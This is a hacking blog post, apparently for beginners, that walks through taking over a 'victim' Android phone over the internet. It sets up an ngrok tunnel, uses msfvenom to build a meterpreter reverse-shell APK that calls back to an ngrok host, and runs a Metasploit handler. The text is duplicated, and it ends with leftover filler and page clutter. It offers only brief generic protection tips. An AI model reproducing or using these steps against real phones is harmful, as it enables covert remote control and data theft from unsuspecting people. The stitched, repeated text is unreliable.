Hi Friends. I hope you guys doing well. So, my previous post was about Hack an Android phone on Local Area Network But today's post will take you to the next level. We will Hack Android phones Over the internet or a WAN without Port forwarding. For this purpose, we need to create a tunnel between your phone and the victim's phone. To do this we have to use Ngrok. Yes! Ngrok will provide a TCP tunnel between two parties.
Devices and Tools:
1. How to install Ngrok in Termux:
Below Screenshot is my Ngrok Dashboard. Here this will provide you a token and it will act as Authorization for your TCP tunnel.
Download Link: Ngrok file
After downloading the file extract it and save it in Internal storage of your android phone /sd card/ngrok/ngrok
Note: Rename the file ngrok from ngrok-stable-Linux-arm
cp /sdcard/ngrok/ngrok $HOME: Copy the ngrok file in Home.
chmod +x ngrok : It means that you want to make the file executable.
cd..: When you type this command you will see two directory Home & Usr.
cp home/ngrok usr/bin: Copying the file from Home to Usr directory
After typing the above commands type ls and your ngrok file will be added in the user directory.
./ngrok authtoken <paste the copied authorization token here>
ngrok tcp 4444
Port forwarding is completed and now its time to create a payload.
2. Create a Payload in Metasploit:
cd metasploit-framework
./msfvenom -p android/meterpreter/reverse_tcp LHOST="Copy from Ngrok's Session" LPORT="Copy from Ngrok's Session" R > /sdcard/hackming.apk
LHOST= 0.tcp.ngrok.io
LPORT= 12345
I am taking it as an example you can type a given value near the 0.tcp.ngrok.io.
3. Use Metasploit Framework:
./msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost Localhost
set lport 4444
exploit
Some Useful Commands in Metasploit Exploit Section:
A drawback with this method, you can’t get multiple meterpreter sessions over a single port. for multiple sessions, you have to follow all the steps all over again with a different port. But do not worry I have a solution for that which I will discuss in my next post.
How you can protect yourself?
Subscribe my News feed to get the latest post updates.
Till Now Good Bye and Take Care.
My Facebook Page:https://www.facebook.com/beginnerstrackofficial/
My Linkedin Page:https://www.linkedin.com/in/beginners-track-a661331a8
My Twitter Page:https://twitter.com/beginnerstracko?s=09
My Instagram Page:https://www.instagram.com/beginnerstrackofficial/?hl=en
My Pinterest Page:https://www.pinterest.com/beginnerstrackofficial/
Author: ADITYA YADAV
I am a blogger and Tech Geek and hacking lover. He loves to keep eyes on Hacking tips and tricks. He is a night time tech blogger."(Blogger by Passion)"
Devices and Tools:
- A non-rooted Samsung Galaxy J2 Pro with a 16GB microSD card connected to my wireless network.
- Termux Application in my Android Phone.
- Metasploit Framework.
- Mi Phone it will act as a Victim Phone.
- Ngrok
1. How to install Ngrok in Termux:
Below Screenshot is my Ngrok Dashboard. Here this will provide you a token and it will act as Authorization for your TCP tunnel.
Download Link: Ngrok file
After downloading the file extract it and save it in Internal storage of your android phone /sd card/ngrok/ngrok
Note: Rename the file ngrok from ngrok-stable-Linux-arm
cp /sdcard/ngrok/ngrok $HOME: Copy the ngrok file in Home.
chmod +x ngrok : It means that you want to make the file executable.
cd..: When you type this command you will see two directory Home & Usr.
cp home/ngrok usr/bin: Copying the file from Home to Usr directory
After typing the above commands type ls and your ngrok file will be added in the user directory.
./ngrok authtoken <paste the copied authorization token here>
ngrok tcp 4444
Port forwarding is completed and now its time to create a payload.
2. Create a Payload in Metasploit:
cd metasploit-framework
./msfvenom -p android/meterpreter/reverse_tcp LHOST="Copy from Ngrok's Session" LPORT="Copy from Ngrok's Session" R > /sdcard/hackming.apk
LHOST= 0.tcp.ngrok.io
LPORT= 12345
I am taking it as an example you can type a given value near the 0.tcp.ngrok.io.
3. Use Metasploit Framework:
./msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost Localhost
set lport 4444
exploit
Some Useful Commands in Metasploit Exploit Section:
How you can protect yourself?
- Only install apps and software from the google play store.
- Make sure you don’t have to enable installs from unknown sources enabled.
- Keep your phone with you at all times.
- Avoid opening any suspicious links in emails or messages.
Subscribe my News feed to get the latest post updates.
Till Now Good Bye and Take Care.
My Facebook Page:https://www.facebook.com/beginnerstrackofficial/
My Linkedin Page:https://www.linkedin.com/in/beginners-track-a661331a8
My Twitter Page:https://twitter.com/beginnerstracko?s=09
My Instagram Page:https://www.instagram.com/beginnerstrackofficial/?hl=en
My Pinterest Page:https://www.pinterest.com/beginnerstrackofficial/
Author: ADITYA YADAV
I am a blogger and Tech Geek and hacking lover. He loves to keep eyes on Hacking tips and tricks. He is a night time tech blogger."(Blogger by Passion)"
This is dummy text. It is not meant to be read. Accordingly, it is difficult to figure out when to end it. But then, this is dummy text. It is not meant to be read. Period.
ConversionConversion EmoticonEmoticon